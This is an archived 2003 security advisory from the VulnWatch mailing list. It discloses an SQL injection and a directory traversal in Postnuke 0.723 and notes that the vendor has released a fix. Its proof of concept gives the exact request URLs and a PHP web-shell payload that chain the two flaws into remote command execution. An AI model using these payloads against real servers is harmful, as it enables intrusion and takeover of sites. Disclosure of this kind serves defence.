NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Vulnwatch> 2003-q1

[VulnWatch] Postnuke v 0.723 SQL injection and directory traversing

salehsurat.scan-associates.net
Date: Sun Mar 09 2003 - 02:18:28 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Products: Postnuke v 0.723 (http://www.postnuke.com)
Date: 09 March 2003
Author: pokleyzz <pokleyzz_at_scan-associates.net>
Contributors: sk_at_scan-associates.net
shaharil_at_scan-associates.net
munir_at_scan-associates.net
URL: http://www.scan-associates.net

Summary: Postnuke v 0.723 SQL injection and directory traversing

Description
===========
Postnuke is Web Content Management System written in PHP and using mysql
as database backend.

Details
=======
There is multiple vulnerabilities in Postnuke v 0.723 as described below.

1) SQL Injection in Members_List module

There is lack in error checking in $sortby variable which is stripslashes.
This variable is used as SQL query to select postnuke member list.

ex:

http://[postnuke
site]/modules.php?op=modload&name=Members_List&file=index&letter=[username]&sortby=[sql
query]

2) Directory traversing through $theme variable

Attacker may include file any file named theme.php

ex:
http://[postnuke site]/index.php?theme=../../../../../../../../tmp

Vendor Response
===============
Vendor has been contacted on 24/02/2003 and fix is available from
http://www.postnuke.com

http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=2378

Proof of concept
================
Postnuke remote command execution

requirement:
   - PostNuke v0.723 maybe other
   - PostNuke user
   - Mysql user must have permision to select into outfile (FILE_PREV)

1) Register as postnuke user.

2) Login as user you just registered. After login change your "Real name"
to something like "<?system($HTTP_GET_VARS[cmd])?>" or just
"<?system($cmd)?>"

3) Sql injection in "Members_List" modules.
Select user information into /tmp/theme.php
.
http://[postnuke
site]/modules.php?op=modload&name=Members_List&file=index&letter=[your
username]&sortby=uname+into+outfile+'/tmp/theme.php'%23

4) Directory traversing in $theme variable
   Run command on server

   http://[postnuke
site]/index.php?theme=../../../../../../../../tmp&cmd=[command]

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]